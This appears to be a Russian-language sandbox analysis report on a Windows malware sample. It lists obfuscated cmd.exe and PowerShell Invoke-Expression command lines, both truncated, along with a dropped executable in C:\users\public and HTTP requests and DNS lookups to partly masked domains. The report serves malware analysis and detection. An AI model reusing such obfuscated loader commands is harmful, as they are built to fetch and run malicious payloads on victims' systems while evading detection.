Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' wmic & %comspec% /v /c set %lraUHPzAbsVzHqu%=mCwzLFOfz&&set %wwcJcfEWo%=w^er^s&&set %IDRbWwQjWASfOmf%=PNhqRlilw&&set %fcnuRbKic%=p^o&&set %YnwQduaXMcMEwXd%=ibmcHXPYPQiwYYN&&set %Y...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\220116.exe
Удаляет следующие файлы
- C:\users\public\220116.exe
Сетевая активность
Подключается к
- 'mi##zan.com':80
- 'be##t.biz':80
TCP
Запросы HTTP GET
- http://mi##zan.com/e/
- http://mi##zan.com/404.html
- http://be##t.biz/esuBzzmU/
UDP
- DNS ASK pr######ole25.edu.konin.pl
- DNS ASK mi##zan.com
- DNS ASK cr######rrencycourse.net
- DNS ASK be##t.biz
- DNS ASK re###t-britv.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' wmic & %comspec% /v /c set %lraUHPzAbsVzHqu%=mCwzLFOfz&&set %wwcJcfEWo%=w^er^s&&set %IDRbWwQjWASfOmf%=PNhqRlilw&&set %fcnuRbKic%=p^o&&set %YnwQduaXMcMEwXd%=ibmcHXPYPQiwYYN&&set %Y...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "InVoKe-expRESsioN ( ('((LSW. ((vARiAbLe XVc*MDR*XVc).nAmE[3,11,2]-joInXVcXVc) ((LSW+LSWXVce'+'UXVcLSW+LSW+XVcZfranc = new-'+'XVc+XLSW+LSWVcobXVLSW+LS'+'WcLSW+LSW+XVcjXVc+XVLS'+'W+LSWcect SysXL...
